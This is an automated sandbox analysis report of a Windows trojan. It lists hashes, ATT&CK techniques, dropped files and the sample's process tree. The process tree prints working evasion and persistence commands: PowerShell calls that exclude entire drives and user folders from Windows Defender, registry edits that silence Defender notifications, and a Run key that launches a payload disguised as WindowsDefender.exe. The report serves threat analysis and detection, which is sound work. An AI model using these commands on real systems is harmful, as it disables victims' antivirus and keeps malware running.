515d4efa87e4dc9103d0d3f42c2b241177e6a5436be06b7f2cff9211be6ea1a6

Analysis

max time kernel
120s
max time network
130s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
06/11/2024, 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
Size

4.6MB
MD5

6c8e7b9edb130c9dab130f66f9bad1c3
SHA1

332e1d7efdf2dc5ecaf6349db417f143b48d60e3
SHA256

28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209
SHA512

74998f93ff487d554c7734e5e7be148a0811d71164447c2a6816469338cc1b00b201e28b2ae01aa3162f63f8908782626206d84a8d62bb64960d0aa8ef38f6c3
SSDEEP

98304:N1Mie3EZD4qxp6QQ7Xs/Vd28BfkFsIjfxVFms:N17ZDxpFQ7XYZfkFsEf8s

Score

10^/10

evasion execution persistence trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2732	powershell.exe
1984	powershell.exe
528	powershell.exe
2168	powershell.exe
2348	powershell.exe
2980	powershell.exe

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEFENDERSERVICE = "C:\\Users\\Admin\\AppData\\Local\\NEWDRIVERS2\\WindowsDefender.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2588	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2348	powershell.exe
2980	powershell.exe
2732	powershell.exe
1984	powershell.exe
528	powershell.exe
2168	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2700 wrote to memory of 2420	2700	28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe	30
PID 2700 wrote to memory of 2420	2700	28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe	30
PID 2700 wrote to memory of 2420	2700	28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe	30
PID 2420 wrote to memory of 2348	2420	cmd.exe	32
PID 2420 wrote to memory of 2348	2420	cmd.exe	32
PID 2420 wrote to memory of 2348	2420	cmd.exe	32
PID 2420 wrote to memory of 2980	2420	cmd.exe	34
PID 2420 wrote to memory of 2980	2420	cmd.exe	34
PID 2420 wrote to memory of 2980	2420	cmd.exe	34
PID 2420 wrote to memory of 2732	2420	cmd.exe	35
PID 2420 wrote to memory of 2732	2420	cmd.exe	35
PID 2420 wrote to memory of 2732	2420	cmd.exe	35
PID 2420 wrote to memory of 1984	2420	cmd.exe	36
PID 2420 wrote to memory of 1984	2420	cmd.exe	36
PID 2420 wrote to memory of 1984	2420	cmd.exe	36
PID 2420 wrote to memory of 528	2420	cmd.exe	37
PID 2420 wrote to memory of 528	2420	cmd.exe	37
PID 2420 wrote to memory of 528	2420	cmd.exe	37
PID 2420 wrote to memory of 2168	2420	cmd.exe	38
PID 2420 wrote to memory of 2168	2420	cmd.exe	38
PID 2420 wrote to memory of 2168	2420	cmd.exe	38
PID 2420 wrote to memory of 1980	2420	cmd.exe	39
PID 2420 wrote to memory of 1980	2420	cmd.exe	39
PID 2420 wrote to memory of 1980	2420	cmd.exe	39
PID 2420 wrote to memory of 1976	2420	cmd.exe	40
PID 2420 wrote to memory of 1976	2420	cmd.exe	40
PID 2420 wrote to memory of 1976	2420	cmd.exe	40
PID 2420 wrote to memory of 2036	2420	cmd.exe	41
PID 2420 wrote to memory of 2036	2420	cmd.exe	41
PID 2420 wrote to memory of 2036	2420	cmd.exe	41
PID 2420 wrote to memory of 2588	2420	cmd.exe	42
PID 2420 wrote to memory of 2588	2420	cmd.exe	42
PID 2420 wrote to memory of 2588	2420	cmd.exe	42
PID 2420 wrote to memory of 1540	2420	cmd.exe	43
PID 2420 wrote to memory of 1540	2420	cmd.exe	43
PID 2420 wrote to memory of 1540	2420	cmd.exe	43

C:\Users\Admin\AppData\Local\Temp\28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
"C:\Users\Admin\AppData\Local\Temp\28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2700
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:528
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\NEWDRIVERS2"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 0
    3⤵
    PID:1980
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 1
    3⤵
    PID:1976
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 1
    3⤵
    - Modifies Windows Defender notification settings
    PID:2036
- - C:\Windows\system32\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v DEFENDERSERVICE /t REG_SZ /d "C:\Users\Admin\AppData\Local\NEWDRIVERS2\WindowsDefender.exe"
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat
    3⤵
    PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat

Filesize
3KB

MD5
d3c39da2d7207deda43b50b864d711a6

SHA1
524e21299fbd42ec1a615a5d67117312996c7922

SHA256
8f803b854c5ae49b6529e08a507a575b695adf826d995ecddd55a315e12d8da7

SHA512
f9e1337a2bf229bc454ff1972b50886baac93ea5f4bb0f8482eb4f9aa1183876973cc00ff9bc19e0cd067576e71224f70de9d27b04407087be5ef89180518cc7

Download Submit
C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat

Filesize
351B

MD5
ce7ef89a43335bb80b9e9b0b67d1a904

SHA1
d1abb8760f3f95744c457825ce89a6686dd094d6

SHA256
8819312c4d6d83836551a96f3ba8f793db1b6caf573a4fdfc1f26cfc71a3116f

SHA512
b03e4f0a3fb727a63583699e7b8a4735edc607d00ada573bc8c7eb6e03a3c386fbc94610a80ea78df857f345f2756a8bdd2e42e6236911f214ee15bf92984ac0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c34b7d58bf5fd98a1fb2d27e75f8433e

SHA1
5b91a120d402a1c065addd37397370ec1390aeb4

SHA256
620b0e47c27243caa41e36d51119646802154212341a401e6b874b3d8cebd0f8

SHA512
6976d6d98b86fe311fc9d332a65aa1f3bba7ace22dcfb0a05a833be54e164353ebde3d3a622fbe6e6ada4dcaf2160669669b868cb1a8d98a91a844ca959b904b

Download Submit
memory/2348-25-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2348-26-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2348-31-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2348-24-0x000007FEF684E000-0x000007FEF684F000-memory.dmp

Filesize
4KB

Download
memory/2348-27-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2348-32-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2348-28-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2348-29-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2348-30-0x000007FEF6590000-0x000007FEF6F2D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-38-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2980-39-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download